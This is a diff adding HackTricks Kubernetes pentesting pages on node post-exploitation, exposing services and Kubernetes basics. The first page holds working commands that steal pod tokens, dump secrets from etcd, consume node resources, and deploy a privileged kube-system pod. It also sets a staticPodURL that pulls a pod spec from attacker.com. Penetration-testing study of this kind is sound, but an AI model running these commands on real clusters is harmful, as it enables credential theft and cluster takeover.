+By default techniques like **ARP spoofing** (and thanks to that **DNS Spoofing**) work in kubernetes network. Then, inside a pod, if you have the **NET\_RAW capability** (which is there by default), you will be able to send custom crafted network packets and perform **MitM attacks via ARP Spoofing to all the pods running in the same node.**\
+Moreover, if the **malicious pod** is running in the **same node as the DNS Server**, you will be able to perform a **DNS Spoofing attack to all the pods in cluster**.
+
+{% content-ref url="kubernetes-network-attacks.md" %}
+[kubernetes-network-attacks.md](kubernetes-network-attacks.md)
+{% endcontent-ref %}
+
+## Node DoS
+
+There is no specification of resources in the Kubernetes manifests and **not applied limit** ranges for the containers. As an attacker, we can **consume all the resources where the pod/deployment running** and starve other resources and cause a DoS for the environment.
+
+This can be done with a tool such as [**stress-ng**](https://zoomadmin.com/HowToInstall/UbuntuPackage/stress-ng):
+
+```
+stress-ng --vm 2 --vm-bytes 2G --timeout 30s
+```
+
+You can see the difference between while running `stress-ng` and after
+
+```bash
+kubectl --namespace big-monolith top pod hunger-check-deployment-xxxxxxxxxx-xxxxx
+```
+
+## Node Post-Exploitation
+
+If you managed to **escape from the container** there are some interesting things you will find in the node:
+
+* The **Container Runtime** process (Docker)
+* More **pods/containers** running in the node you can abuse like this one (more tokens)
+* The whole **filesystem** and **OS** in general
+* The **Kube-Proxy** service listening
+* The **Kubelet** service listening. Check config files:
+  * Directory: `/var/lib/kubelet/`
+    * `/var/lib/kubelet/kubeconfig`
+    * `/var/lib/kubelet/kubelet.conf`
+    * `/var/lib/kubelet/config.yaml`
+    * `/var/lib/kubelet/kubeadm-flags.env`
+    * `/etc/kubernetes/kubelet-kubeconfig`
+  * Other **kubernetes common files**:
+    * `$HOME/.kube/config` - **User Config**
+    * `/etc/kubernetes/kubelet.conf`- **Regular Config**
+    * `/etc/kubernetes/bootstrap-kubelet.conf` - **Bootstrap Config**
+    * `/etc/kubernetes/manifests/etcd.yaml` - **etcd Configuration**
+    * `/etc/kubernetes/pki` - **Kubernetes Key**
+
+### Find node kubeconfig
+
+If you cannot find the kubeconfig file in one of the previously commented paths, **check the argument `--kubeconfig` of the kubelet process**:
+
+```
+ps -ef | grep kubelet
+root        1406       1  9 11:55 ?        00:34:57 kubelet --cloud-provider=aws --cni-bin-dir=/opt/cni/bin --cni-conf-dir=/etc/cni/net.d --config=/etc/kubernetes/kubelet-conf.json --exit-on-lock-contention --kubeconfig=/etc/kubernetes/kubelet-kubeconfig --lock-file=/var/run/lock/kubelet.lock --network-plugin=cni --container-runtime docker --node-labels=node.kubernetes.io/role=k8sworker --volume-plugin-dir=/var/lib/kubelet/volumeplugin --node-ip 10.1.1.1 --hostname-override ip-1-1-1-1.eu-west-2.compute.internal
+```
+
+### Steal Secrets
+
+```bash
+# Check Kubelet privileges
+kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
+
+# Steal the tokens from the pods running in the node
+# The most interesting one is probably the one of kube-system
+ALREADY="IinItialVaaluE"
+for i in $(mount | sed -n '/secret/ s/^tmpfs on \(.*default.*\) type tmpfs.*$/\1\/namespace/p'); do
+    TOKEN=$(cat $(echo $i | sed 's/.namespace$/\/token/'))
+    if ! [ $(echo $TOKEN | grep -E $ALREADY) ]; then
+        ALREADY="$ALREADY|$TOKEN"
+        echo "Directory: $i"
+        echo "Namespace: $(cat $i)"
+        echo ""
+        echo $TOKEN
+        echo "================================================================================"
+        echo ""
+    fi
+done
+```
+
+The script [**can-they.sh**](https://github.com/BishopFox/badPods/blob/main/scripts/can-they.sh) will automatically **get the tokens of other pods and check if they have the permission** you are looking for (instead of you looking 1 by 1):
+
+```bash
+./can-they.sh -i "--list -n default"
+./can-they.sh -i "list secrets -n kube-system"// Some code
+```
+
+### Privileged DaemonSets
+
+A DaemonSet is a **pod** that will be **run** in **all the nodes of the cluster**. Therefore, if a DaemonSet is configured with a **privileged service account,** in **ALL the nodes** you are going to be able to find the **token** of that **privileged service account** that you could abuse.
+
+The exploit is the same one as in the previous section, but you now don't depend on luck.
+
+### Pivot to Cloud
+
+If the cluster is managed by a cloud service, usually the **Node will have a different access to the metadata** endpoint than the Pod. Therefore, try to **access the metadata endpoint from the node** (or from a pod with hostNetwork to True):
+
+{% content-ref url="kubernetes-pivoting-to-clouds.md" %}
+[kubernetes-pivoting-to-clouds.md](kubernetes-pivoting-to-clouds.md)
+{% endcontent-ref %}
+
+### Steal etcd
+
+If you can specify the [**nodeName**](https://kubernetes.io/docs/tasks/configure-pod-container/assign-pods-nodes/#create-a-pod-that-gets-scheduled-to-specific-node) of the Node that will run the container, get a shell inside a control-plane node and get the **etcd database**:
+
+```
+kubectl get nodes
+NAME                STATUS   ROLES    AGE   VERSION
+k8s-control-plane   Ready    master   93d   v1.19.1
+k8s-worker          Ready    <none>   93d   v1.19.1
+```
+
+control-plane nodes have the **role master** and in **cloud managed clusters you won't be able to run anything in them**.
+
+#### Read secrets from etcd 1
+
+If you can run your pod on a control-plane node using the `nodeName` selector in the pod spec, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets.
+
+Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion.
+
+**Check to see if `etcd` is running on the control-plane node and see where the database is (This is on a `kubeadm` created cluster)**
+
+```
+root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir
+```
+
+Output:
+
+```bash
+data-dir=/var/lib/etcd
+```
+
+**View the data in etcd database:**
+
+```bash
+strings /var/lib/etcd/member/snap/db | less
+```
+
+**Extract the tokens from the database and show the service account name**
+
+```bash
+db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done
+```
+
+**Same command, but some greps to only return the default token in the kube-system namespace**
+
+```bash
+db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default
+```
+
+Output:
+
+```
+1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
+```
+
+#### Read secrets from etcd 2 [from here](https://www.linkedin.com/posts/grahamhelton_want-to-hack-kubernetes-here-is-a-cheatsheet-activity-7241139106708164608-hLAC/?utm_source=share\&utm_medium=member_android)
+
+1. Create a snapshot of the **`etcd`** database. Check [**this script**](https://gist.github.com/grahamhelton/0740e1fc168f241d1286744a61a1e160) for further info.
+2. Transfer the **`etcd`** snapshot out of the node in your favourite way.
+3. Unpack the database:
+
+{% code overflow="wrap" %}
+```bash
+mkdir -p restore ; etcdutl snapshot restore etcd-loot-backup.db \ --data-dir ./restore
+```
+{% endcode %}
+
+4. Start **`etcd`** on your local machine and make it use the stolen snapshot:
+
+{% code overflow="wrap" %}
+```bash
+etcd \ --data-dir=./restore \ --initial-cluster=state=existing \ --snapshot='./etcd-loot-backup.db'
+
+```
+{% endcode %}
+
+5. List all the secrets:
+
+```bash
+etcdctl get "" --prefix --keys-only | grep secret 
+```
+
+6. Get the secfrets:
+
+```bash
+ etcdctl get /registry/secrets/default/my-secret
+```
+
+### Static/Mirrored Pods Persistence
+
+_Static Pods_ are managed directly by the kubelet daemon on a specific node, without the API server observing them. Unlike Pods that are managed by the control plane (for example, a Deployment); instead, the **kubelet watches each static Pod** (and restarts it if it fails).
+
+Therefore, static Pods are always **bound to one Kubelet** on a specific node.
+
+The **kubelet automatically tries to create a mirror Pod on the Kubernetes API server** for each static Pod. This means that the Pods running on a node are visible on the API server, but cannot be controlled from there. The Pod names will be suffixed with the node hostname with a leading hyphen.
+
+{% hint style="danger" %}
+The **`spec` of a static Pod cannot refer to other API objects** (e.g., ServiceAccount, ConfigMap, Secret, etc. So **you cannot abuse this behaviour to launch a pod with an arbitrary serviceAccount** in the current node to compromise the cluster. But you could use this to run pods in different namespaces (in case thats useful for some reason).
+{% endhint %}
+
+If you are inside the node host you can make it create a **static pod inside itself**. This is pretty useful because it might allow you to **create a pod in a different namespace** like **kube-system**.
+
+In order to create a static pod, the [**docs are a great help**](https://kubernetes.io/docs/tasks/configure-pod-container/static-pod/). You basically need 2 things:
+
+* Configure the param **`--pod-manifest-path=/etc/kubernetes/manifests`** in the **kubelet service**, or in the **kubelet config** ([**staticPodPath**](https://kubernetes.io/docs/reference/config-api/kubelet-config.v1beta1/#kubelet-config-k8s-io-v1beta1-KubeletConfiguration)) and restart the service
+* Create the definition on the **pod definition** in **`/etc/kubernetes/manifests`**
+
+**Another more stealth way would be to:**
+
+* Modify the param **`staticPodURL`** from **kubelet** config file and set something like `staticPodURL: http://attacker.com:8765/pod.yaml`. This will make the kubelet process create a **static pod** getting the **configuration from the indicated URL**.
+
+**Example** of **pod** configuration to create a privilege pod in **kube-system** taken from [**here**](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/):
+
+```yaml
+apiVersion: v1
+kind: Pod
+metadata:
+  name: bad-priv2
+  namespace: kube-system
+spec:
+  containers:
+  - name: bad
+    hostPID: true
+    image: gcr.io/shmoocon-talk-hacking/brick
+    stdin: true
+    tty: true
+    imagePullPolicy: IfNotPresent
+    volumeMounts:
+      - mountPath: /chroot
+        name: host
+  securityContext:
+    privileged: true
+  volumes:
+  - name: host
+    hostPath:
+      path: /
+      type: Directory
+```
+
+### Delete pods + unschedulable nodes
+
+If an attacker has **compromised a node** and he can **delete pods** from other nodes and **make other nodes not able to execute pods**, the pods will be rerun in the compromised node and he will be able to **steal the tokens** run in them.\
+For [**more info follow this links**](abusing-roles-clusterroles-in-kubernetes/#delete-pods-+-unschedulable-nodes).
+
+## Automatic Tools
+
+* [**https://github.com/inguardians/peirates**](https://github.com/inguardians/peirates)
+
+```
+Peirates v1.1.8-beta by InGuardians
+  https://www.inguardians.com/peirates
+----------------------------------------------------------------
+[+] Service Account Loaded: Pod ns::dashboard-56755cd6c9-n8zt9
+[+] Certificate Authority Certificate: true
+[+] Kubernetes API Server: https://10.116.0.1:443
+[+] Current hostname/pod name: dashboard-56755cd6c9-n8zt9
+[+] Current namespace: prd
+----------------------------------------------------------------
+Namespaces, Service Accounts and Roles |
+---------------------------------------+
+[1] List, maintain, or switch service account contexts [sa-menu]  (try: listsa *, switchsa)
+[2] List and/or change namespaces [ns-menu] (try: listns, switchns)
+[3] Get list of pods in current namespace [list-pods]
+[4] Get complete info on all pods (json) [dump-pod-info]
+[5] Check all pods for volume mounts [find-volume-mounts]
+[6] Enter AWS IAM credentials manually [enter-aws-credentials]
+[7] Attempt to Assume a Different AWS Role [aws-assume-role]
+[8] Deactivate assumed AWS role [aws-empty-assumed-role]
+[9] Switch authentication contexts: certificate-based authentication (kubelet, kubeproxy, manually-entered) [cert-menu]
+-------------------------+
+Steal Service Accounts   |
+-------------------------+
+[10] List secrets in this namespace from API server [list-secrets]
+[11] Get a service account token from a secret [secret-to-sa]
+[12] Request IAM credentials from AWS Metadata API [get-aws-token] *
+[13] Request IAM credentials from GCP Metadata API [get-gcp-token] *
+[14] Request kube-env from GCP Metadata API [attack-kube-env-gcp]
+[15] Pull Kubernetes service account tokens from kops' GCS bucket (Google Cloudonly) [attack-kops-gcs-1]  *
+[16] Pull Kubernetes service account tokens from kops' S3 bucket (AWS only) [attack-kops-aws-1]
+--------------------------------+
+Interrogate/Abuse Cloud API's   |
+--------------------------------+
+[17] List AWS S3 Buckets accessible (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls]
+[18] List contents of an AWS S3 Bucket (Make sure to get credentials via get-aws-token or enter manually) [aws-s3-ls-objects]
+-----------+
+Compromise |
+-----------+
+[20] Gain a reverse rootshell on a node by launching a hostPath-mounting pod [attack-pod-hostpath-mount]
+[21] Run command in one or all pods in this namespace via the API Server [exec-via-api]
+[22] Run a token-dumping command in all pods via Kubelets (authorization permitting) [exec-via-kubelet]
+-------------+
+Node Attacks |
+-------------+
+[30] Steal secrets from the node filesystem [nodefs-steal-secrets]
+-----------------+
+Off-Menu         +
+-----------------+
+[90] Run a kubectl command using the current authorization context [kubectl [arguments]]
+[] Run a kubectl command using EVERY authorization context until one works [kubectl-try-all [arguments]]
+[91] Make an HTTP request (GET or POST) to a user-specified URL [curl]
+[92] Deactivate "auth can-i" checking before attempting actions [set-auth-can-i]
+[93] Run a simple all-ports TCP port scan against an IP address [tcpscan]
+[94] Enumerate services via DNS [enumerate-dns] *
+[]  Run a shell command [shell <command and arguments>]
+
+[exit] Exit Peirates
+```
+
+* [**https://github.com/r0binak/MTKPI**](https://github.com/r0binak/MTKPI)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md b/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
new file mode 100644
index 0000000000..fec9cdaece
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/exposing-services-in-kubernetes.md
@@ -0,0 +1,252 @@
+# Exposing Services in Kubernetes
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+There are **different ways to expose services** in Kubernetes so both **internal** endpoints and **external** endpoints can access them. This Kubernetes configuration is pretty critical as the administrator could give access to **attackers to services they shouldn't be able to access**.
+
+### Automatic Enumeration
+
+Before starting enumerating the ways K8s offers to expose services to the public, know that if you can list namespaces, services and ingresses, you can find everything exposed to the public with:
+
+```bash
+kubectl get namespace -o custom-columns='NAME:.metadata.name' | grep -v NAME | while IFS='' read -r ns; do
+    echo "Namespace: $ns"
+    kubectl get service -n "$ns"
+    kubectl get ingress -n "$ns"
+    echo "=============================================="
+    echo ""
+    echo ""
+done | grep -v "ClusterIP"
+# Remove the last '| grep -v "ClusterIP"' to see also type ClusterIP
+```
+
+### ClusterIP
+
+A **ClusterIP** service is the **default** Kubernetes **service**. It gives you a **service inside** your cluster that other apps inside your cluster can access. There is **no external access**.
+
+However, this can be accessed using the Kubernetes Proxy:
+
+```bash
+kubectl proxy --port=8080
+```
+
+Now, you can navigate through the Kubernetes API to access services using this scheme:
+
+`http://localhost:8080/api/v1/proxy/namespaces/<NAMESPACE>/services/<SERVICE-NAME>:<PORT-NAME>/`
+
+For example you could use the following URL:
+
+`http://localhost:8080/api/v1/proxy/namespaces/default/services/my-internal-service:http/`
+
+to access this service:
+
+```yaml
+apiVersion: v1
+kind: Service
+metadata:  
+  name: my-internal-service
+spec:
+  selector:
+    app: my-app
+  type: ClusterIP
+  ports:  
+  - name: http
+    port: 80
+    targetPort: 80
+    protocol: TCP
+```
+
+_This method requires you to run `kubectl` as an **authenticated user**._
+
+List all ClusterIPs:
+
+{% code overflow="wrap" %}
+```bash
+kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep ClusterIP
+```
+{% endcode %}
+
+### NodePort
+
+When **NodePort** is utilised, a designated port is made available on all Nodes (representing the Virtual Machines). **Traffic** directed to this specific port is then systematically **routed to the service**. Typically, this method is not recommended due to its drawbacks.
+
+List all NodePorts:
+
+{% code overflow="wrap" %}
+```bash
+kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep NodePort
+```
+{% endcode %}
+
+An example of NodePort specification:
+
+```yaml
+apiVersion: v1
+kind: Service
+metadata:  
+  name: my-nodeport-service
+spec:
+  selector:    
+    app: my-app
+  type: NodePort
+  ports:  
+  - name: http
+    port: 80
+    targetPort: 80
+    nodePort: 30036
+    protocol: TCP
+```
+
+If you **don't specify** the **nodePort** in the yaml (it's the port that will be opened) a port in the **range 30000–32767 will be used**.
+
+### LoadBalancer <a href="#id-0d96" id="id-0d96"></a>
+
+Exposes the Service externally **using a cloud provider's load balancer**. On GKE, this will spin up a [Network Load Balancer](https://cloud.google.com/compute/docs/load-balancing/network/) that will give you a single IP address that will forward all traffic to your service. In AWS it will launch a Load Balancer.
+
+You have to pay for a LoadBalancer per exposed service, which can be expensive.
+
+List all LoadBalancers:
+
+{% code overflow="wrap" %}
+```bash
+kubectl get services --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,TYPE:.spec.type,CLUSTER-IP:.spec.clusterIP,EXTERNAL-IP:.status.loadBalancer.ingress[*],PORT(S):.spec.ports[*].port,NODEPORT(S):.spec.ports[*].nodePort,TARGETPORT(S):.spec.ports[*].targetPort,SELECTOR:.spec.selector' | grep LoadBalancer
+```
+{% endcode %}
+
+### External IPs <a href="#external-ips" id="external-ips"></a>
+
+{% hint style="success" %}
+External IPs are exposed by services of type Load Balancers and they are generally used when an external Cloud Provider Load Balancer is being used.
+
+For finding them, check for load balancers with values in the `EXTERNAL-IP` field.
+{% endhint %}
+
+Traffic that ingresses into the cluster with the **external IP** (as **destination IP**), on the Service port, will be **routed to one of the Service endpoints**. `externalIPs` are not managed by Kubernetes and are the responsibility of the cluster administrator.
+
+In the Service spec, `externalIPs` can be specified along with any of the `ServiceTypes`. In the example below, "`my-service`" can be accessed by clients on "`80.11.12.10:80`" (`externalIP:port`)
+
+```yaml
+apiVersion: v1
+kind: Service
+metadata:
+  name: my-service
+spec:
+  selector:
+    app: MyApp
+  ports:
+    - name: http
+      protocol: TCP
+      port: 80
+      targetPort: 9376
+  externalIPs:
+    - 80.11.12.10
+```
+
+### ExternalName
+
+[**From the docs:**](https://kubernetes.io/docs/concepts/services-networking/service/#externalname) Services of type ExternalName **map a Service to a DNS name**, not to a typical selector such as `my-service` or `cassandra`. You specify these Services with the `spec.externalName` parameter.
+
+This Service definition, for example, maps the `my-service` Service in the `prod` namespace to `my.database.example.com`:
+
+```yaml
+apiVersion: v1
+kind: Service
+metadata:
+  name: my-service
+  namespace: prod
+spec:
+  type: ExternalName
+  externalName: my.database.example.com
+```
+
+When looking up the host `my-service.prod.svc.cluster.local`, the cluster DNS Service returns a `CNAME` record with the value `my.database.example.com`. Accessing `my-service` works in the same way as other Services but with the crucial difference that **redirection happens at the DNS level** rather than via proxying or forwarding.
+
+List all ExternalNames:
+
+{% code overflow="wrap" %}
+```bash
+kubectl get services --all-namespaces | grep ExternalName
+```
+{% endcode %}
+
+### Ingress
+
+Unlike all the above examples, **Ingress is NOT a type of service**. Instead, it sits **in front of multiple services and act as a “smart router”** or entrypoint into your cluster.
+
+You can do a lot of different things with an Ingress, and there are **many types of Ingress controllers that have different capabilities**.
+
+The default GKE ingress controller will spin up a [HTTP(S) Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) for you. This will let you do both path based and subdomain based routing to backend services. For example, you can send everything on foo.yourdomain.com to the foo service, and everything under the yourdomain.com/bar/ path to the bar service.
+
+The YAML for a Ingress object on GKE with a [L7 HTTP Load Balancer](https://cloud.google.com/compute/docs/load-balancing/http/) might look like this:
+
+```yaml
+apiVersion: extensions/v1beta1
+kind: Ingress
+metadata:
+  name: my-ingress
+spec:
+  backend:
+    serviceName: other
+    servicePort: 8080
+  rules:
+  - host: foo.mydomain.com
+    http:
+      paths:
+      - backend:
+          serviceName: foo
+          servicePort: 8080
+  - host: mydomain.com
+    http:
+      paths:
+      - path: /bar/*
+        backend:
+          serviceName: bar
+          servicePort: 8080
+```
+
+List all the ingresses:
+
+{% code overflow="wrap" %}
+```bash
+kubectl get ingresses --all-namespaces -o=custom-columns='NAMESPACE:.metadata.namespace,NAME:.metadata.name,RULES:spec.rules[*],STATUS:status'
+```
+{% endcode %}
+
+Although in this case it's better to get the info of each one by one to read it better:
+
+```bash
+kubectl get ingresses --all-namespaces -o=yaml
+```
+
+### References
+
+* [https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0](https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0)
+* [https://kubernetes.io/docs/concepts/services-networking/service/](https://kubernetes.io/docs/concepts/services-networking/service/)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/kubernetes-security/kubernetes-basics.md b/pentesting-cloud/kubernetes-security/kubernetes-basics.md
new file mode 100644
index 0000000000..61bfad2696
--- /dev/null
+++ b/pentesting-cloud/kubernetes-security/kubernetes-basics.md
@@ -0,0 +1,596 @@
+# Kubernetes Basics
+
+## Kubernetes Basics
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**The original author of this page is** [**Jorge**](https://www.linkedin.com/in/jorge-belmonte-a924b616b/) **(read his original post** [**here**](https://sickrov.github.io)**)**
+
+## Architecture & Basics
+
+### What does Kubernetes do?
+
+* Allows running container/s in a container engine.
+* Schedule allows containers mission efficient.
+* Keep containers alive.
+* Allows container communications.
+* Allows deployment techniques.
+* Handle volumes of information.
+
+### Architecture
+
+![](https://sickrov.github.io/media/Screenshot-68.jpg)
+
+* **Node**: operating system with pod or pods.
+  * **Pod**: Wrapper around a container or multiple containers with. A pod should only contain one application (so usually, a pod run just 1 container). The pod is the way kubernetes abstracts the container technology running.
+    * **Service**: Each pod has 1 internal **IP address** from the internal range of the node. However, it can be also exposed via a service. The **service has also an IP address** and its goal is to maintain the communication between pods so if one dies the **new replacement** (with a different internal IP) **will be accessible** exposed in the **same IP of the service**. It can be configured as internal or external. The service also actuates as a **load balancer when 2 pods are connected** to the same service.\
+      When a **service** is **created** you can find the endpoints of each service running `kubectl get endpoints`
+* **Kubelet**: Primary node agent. The component that establishes communication between node and kubectl, and only can run pods (through API server). The kubelet doesn’t manage containers that were not created by Kubernetes.
+* **Kube-proxy**: is the service in charge of the communications (services) between the apiserver and the node. The base is an IPtables for nodes. Most experienced users could install other kube-proxies from other vendors.
+* **Sidecar container**: Sidecar containers are the containers that should run along with the main container in the pod. This sidecar pattern extends and enhances the functionality of current containers without changing them. Nowadays, We know that we use container technology to wrap all the dependencies for the application to run anywhere. A container does only one thing and does that thing very well.
+* **Master process:**
+  * **Api Server:** Is the way the users and the pods use to communicate with the master process. Only authenticated request should be allowed.
+  * **Scheduler**: Scheduling refers to making sure that Pods are matched to Nodes so that Kubelet can run them. It has enough intelligence to decide which node has more available resources the assign the new pod to it. Note that the scheduler doesn't start new pods, it just communicate with the Kubelet process running inside the node, which will launch the new pod.
+  * **Kube Controller manager**: It checks resources like replica sets or deployments to check if, for example, the correct number of pods or nodes are running. In case a pod is missing, it will communicate with the scheduler to start a new one. It controls replication, tokens, and account services to the API.
+  * **etcd**: Data storage, persistent, consistent, and distributed. Is Kubernetes’s database and the key-value storage where it keeps the complete state of the clusters (each change is logged here). Components like the Scheduler or the Controller manager depends on this date to know which changes have occurred (available resourced of the nodes, number of pods running...)
+* **Cloud controller manager**: Is the specific controller for flow controls and applications, i.e: if you have clusters in AWS or OpenStack.
+
+Note that as the might be several nodes (running several pods), there might also be several master processes which their access to the Api server load balanced and their etcd synchronized.
+
+**Volumes:**
+
+When a pod creates data that shouldn't be lost when the pod disappear it should be stored in a physical volume. **Kubernetes allow to attach a volume to a pod to persist the data**. The volume can be in the local machine or in a **remote storage**. If you are running pods in different physical nodes you should use a remote storage so all the pods can access it.
+
+**Other configurations:**
+
+* **ConfigMap**: You can configure **URLs** to access services. The pod will obtain data from here to know how to communicate with the rest of the services (pods). Note that this is not the recommended place to save credentials!
+* **Secret**: This is the place to **store secret data** like passwords, API keys... encoded in B64. The pod will be able to access this data to use the required credentials.
+* **Deployments**: This is where the components to be run by kubernetes are indicated. A user usually won't work directly with pods, pods are abstracted in **ReplicaSets** (number of same pods replicated), which are run via deployments. Note that deployments are for **stateless** applications. The minimum configuration for a deployment is the name and the image to run.
+* **StatefulSet**: This component is meant specifically for applications like **databases** which needs to **access the same storage**.
+* **Ingress**: This is the configuration that is use to **expose the application publicly with an URL**. Note that this can also be done using external services, but this is the correct way to expose the application.
+  * If you implement an Ingress you will need to create **Ingress Controllers**. The Ingress Controller is a **pod** that will be the endpoint that will receive the requests and check and will load balance them to the services. the ingress controller will **send the request based on the ingress rules configured**. Note that the ingress rules can point to different paths or even subdomains to different internal kubernetes services.
+    * A better security practice would be to use a cloud load balancer or a proxy server as entrypoint to don't have any part of the Kubernetes cluster exposed.
+    * When request that doesn't match any ingress rule is received, the ingress controller will direct it to the "**Default backend**". You can `describe` the ingress controller to get the address of this parameter.
+    * `minikube addons enable ingress`
+
+### PKI infrastructure - Certificate Authority CA:
+
+![](https://sickrov.github.io/media/Screenshot-66.jpg)
+
+* CA is the trusted root for all certificates inside the cluster.
+* Allows components to validate to each other.
+* All cluster certificates are signed by the CA.
+* ETCd has its own certificate.
+* types:
+  * apiserver cert.
+  * kubelet cert.
+  * scheduler cert.
+
+## Basic Actions
+
+### Minikube
+
+**Minikube** can be used to perform some **quick tests** on kubernetes without needing to deploy a whole kubernetes environment. It will run the **master and node processes in one machine**. Minikube will use virtualbox to run the node. See [**here how to install it**](https://minikube.sigs.k8s.io/docs/start/).
+
+```
+$ minikube start
+😄  minikube v1.19.0 on Ubuntu 20.04
